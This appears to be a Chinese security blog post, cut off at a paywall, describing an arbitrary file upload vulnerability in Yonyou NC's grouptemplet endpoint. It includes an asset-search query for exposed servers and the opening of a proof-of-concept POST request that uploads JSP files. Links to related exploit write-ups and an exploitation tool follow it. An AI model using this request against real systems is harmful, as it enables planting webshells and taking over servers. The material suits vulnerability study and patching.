用友 NC grouptemplet 文件上传漏洞

最新推荐文章于 2026-01-03 22:47:49 发布
原创 最新推荐文章于 2026-01-03 22:47:49 发布 · 1.1k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全 #网络

本文介绍了用友NC中存在的任意文件上传漏洞,攻击者可借此获取服务器权限。建议企业升级至安全版本,限制公网访问并实施白名单策略来保护系统安全。

产品简介

用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。
漏洞介绍
用友 NC grouptemplet接口处存在任意文件上传漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

资产测绘

title=“YONYOU NC”
在这里插入图片描述

漏洞复现

POC:

POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp&maxSize=999 HTTP/1.1
Host: your_ip
Content-Type: multipart/form-data; boundary=---
最低0.47元/天 解锁文章
keepb1ue
关注
用友NC grouptemplet任意文件上传漏洞(含批量验证poc)
weixin_43567873的博客
04-17 531
用友NC grouptemplet任意文件上传漏洞(含批量验证poc)
漏洞复现】用友-移动系统管理-upload-uploadComponent-文件上传
漏洞复现
01-26 189
用友移动系统管理是用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。用友移动系统管理允许攻击者通过 upload 接口构造特定的请求包进行任意文件上传。该漏洞使得攻击者可以在受影响的系统上上传恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。攻击者可以通过上传恶意文件来滥用系统,可能导致灾难性后果。
用友NC Cloud saveImageServlet/doPost接口存在任意文件上传漏洞
wan___she__pi的博客
04-21 1117
用友NC Cloud 是基于云计算技术的企业管理软件。它提供了一系列的功能模块,涵盖了企业的各个管理领域,包括财务管理、人力资源管理、供应链管理、生产制造管理等。通过云端部署,用户可以随时随地通过网络访问和使用这些功能,无需在本地安装软件,企业可以实现信息化管理,提高管理效率和决策能力。它提供了实时数据分析和报表功能,帮助企业监控业务运营情况,及时掌握关键指标和业绩表现。同时,用友NC Cloud 还支持多终端访问,适应各种不同的设备和工作场景,方便用户灵活办公和协作。
用友全版本任意文件上传漏洞复现
故事讲予风听
07-26 2482
可以使用安全的文件验证机制,例如校验文件的魔术字节、文件头信息、文件结尾等,以确保上传的文件是预期的有效文件,并阻止上传恶意文件。限制文件上传:通过限制用户上传文件的类型、大小和目标路径,可以有效减少任意文件上传漏洞的风险。安全教育和培训:对系统管理员和用户进行安全教育和培训,提高其安全意识,让他们了解常见的安全威胁和最佳实践,以便正确地使用系统和应对潜在威胁。安全审计和监控:实施安全审计和监控机制,定期检查系统日志、访问日志和上传文件日志,及时发现异常活动和潜在的攻击行为。利用此漏洞需要俩段poc。
漏洞复现--用友NC-Cloud全版本任意文件上传/RCE
qq_53003652的博客
10-19 4132
NC Cloud是指用友公司推出的大型企业数字化平台。支持公有云、混合云、专属云的灵活部署模式。该产品最近爆出了全版本的一个文件上传/RCE,攻击者可利用此漏洞直接获得服务器权限。这里不知道为什么404,但c0nf1g.jsp上传成功了,后续操作正常。2.POST访问c0nf1g.jsp构造RCE。联系厂家发布更新补丁。
用友NC grouptemplet 存在任意文件上传漏洞
wan___she__pi的博客
04-29 728
用友NC 是基于云计算技术的企业管理软件。它提供了一系列的功能模块,涵盖了企业的各个管理领域,包括财务管理、人力资源管理、供应链管理、生产制造管理等。通过云端部署,用户可以随时随地通过网络访问和使用这些功能,无需在本地安装软件,企业可以实现信息化管理,提高管理效率和决策能力。它提供了实时数据分析和报表功能,帮助企业监控业务运营情况,及时掌握关键指标和业绩表现。
精选资源
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击...
用友NC grouptemplet 任意文件上传漏洞复现(XVE-2024-8857)
0xSec
04-24 730
用友 NC grouptemplet 接口处存在任意文件上传漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
漏洞复现】用友NC-任意文件上传-uploadFile
漏洞复现
05-05 612
用友NC是北京用友软件股份有限公司(简称“用友”)开发的一款企业管理软件,支持财务会计、人力资源、供应链、生产制造、客户关系管理等多个业务领域,涵盖了企业核心业务及管理流程。用友NC是基于B/S架构的软件系统,提供基于云计算、SaaS模式、本地部署等多种部署方式,广泛应用于国内外众多中小型企业和大型企业。用友NC允许攻击者通过uploadFile接口构造特定的请求包进行任意文件上传。该漏洞使得攻击者可以在受影响的系统上上传恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。
Web项目中各文件夹的作用
萧无义的武功秘籍
04-17 3314
/WEB-INF安全目录 , 用户不能直接访问该目录下的内容 /WEB-INF/web.xmlWeb应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则 , 优先级要大于服务器中web.xml。 /WEB-INF/classes/包含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中。 /WEB-I...
报表代码_u8安装28672_报表代码制定_uapim_用友U8UAP_UAP开发_
10-04
用友U8UAP开发示例,使用C#语言,适合初学者。
漏洞复现】用友NC——文件上传漏洞
weixin_54799594的博客
07-16 2515
漏洞复现过程记录
uniapp富文本编辑器上传到Fastadmin,P标签被过滤解决办法
u012365440的博客
07-06 1771
最近用到uniapp和fastadmin开发项目的时候遇到一个比较棘手的问题。 就是uniapp使用富文本编辑器上传图片的时候,明明在编辑器中已经正常上传图片,但是提交完表单,在数据库查看的时候发现仅保存了文字 部分的内容,而图片链接并没有被保存下来。 先上个图: 大家仔细看content字段表的部分,第二行的数据是在后台添加的,第一个数据是uniapp提交添加的。区别很明显,因为p标签被过滤掉了,所以图片链接也没有保存进来。 原因:Thinkphp5的表单上传默认会过滤掉p标签
用友NC saveImageServlet 任意文件上传漏洞复现(XVE-2024-7471)
0xSec
04-12 1162
用友 NC saveImageServlet 接口处存在任意文件上传漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
用友NC-uapjs代码执行漏洞(含批量验证poc)
weixin_43567873的博客
04-07 495
用友NC-uapjs代码执行漏洞(含批量验证poc)
小迪安全_第4天:基础入门-30余种加密编码进制&Web&数据库&系统&代码&参数值|小迪安全笔记|网络安全|
weixin_45635831的博客
12-30 633
综合性加密平台:支持大部分常见加密算法,但部分特殊加密需要借助其他平台主要功能:提供MD5、SHA1等加密算法的反向查询服务数据库规模:记录约90万亿条,占用硬盘超过500TB查询成功率:全球领先,达95%以上,部分复杂密文仅该平台可查运营时间:自2006年运行至今,国内外享有盛誉识别能力:掌握各种加密方式的识别方法和特征应用场景:了解不同加密算法在实际中的应用场景解决思路:明确解密所需条件和可能遇到的限制。
【要闻周报】网络安全与数据合规 12-31
专注于制造仓库、生产线边仓、物流仓储等人工拆零拣选辅助系统以及前沿技术。
12-31 967
国家网信办发布《网络数据安全风险评估办法(征求意见稿)》、国家计算机病毒应急处理中心检测发现69款违法违规收集使用个人信息的App、《贵州省大数据发展应用促进条例》自2026年1月1日起施行、湖南省网信办发布2025年度湖南省汽车数据报送工作的通知、上海发布5起不履行个人信息保护义务的典型案例、欧盟:欧盟委员会依据DSA对X处以1.2亿欧元罚款、爱尔兰:CnaM对LinkedIn和TikTok展开DSA潜在违法调查。
新规解读:2025 年修正版《中华人民共和国网络安全法》核心变化解读
meidaoliha的博客
12-30 762
强化新兴技术安全监管:将人工智能纳入法律框架,明确技术研发与伦理规范并行的发展路径。强化关键主体责任:针对关键信息基础设施运营者、网络产品服务提供者设置更严格的义务与处罚标准。强化法律体系衔接:与《数据安全法》《个人信息保护法》《人工智能法(草案)》形成协同,构建全方位的网络安全法治体系。对行业而言,修正版的实施将推动网络运营者加大安全投入,加速人工智能安全技术的研发与应用,同时倒逼企业完善数据治理与合规管理体系,为我国数字经济高质量发展筑牢安全屏障。新修正法规见上篇文章。
网络安全渗透靶场学习经验&2025年个人博客技术深度总结
最新发布
mooyuan的网络安全博客
01-03 774
本文总结了2025年网络安全渗透靶场的学习经验,针对当前网络靶场教程存在的复现困难、原理讲解不足等问题,系统整理了六大综合靶场(Pikachu、DVWA等)、两大专项靶场(upload-labs、sqli-labs)以及Web框架/系统漏洞靶场的283篇技术博客。重点分享了从基础漏洞到内网渗透的进阶路径,特别推荐DVWA靶场的多层级安全实践和CTFHub在线靶场。文章还详细记录了红日靶场内网渗透的实战过程,并预告将开启"人工智能与网络安全"新系列。作者通过详尽的漏洞原理分析和环境搭建指南
用友nc6.5 文件上传
09-06
用友NC6.5中,文件上传通常是通过以下步骤完成的: 1. 登录用友NC6.5系统,进入相关业务模块或页面。 2. 找到需要上传文件的相关功能或模块按钮,通常会有一个上传文件的图标或链接。 3. 点击上传文件按钮或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值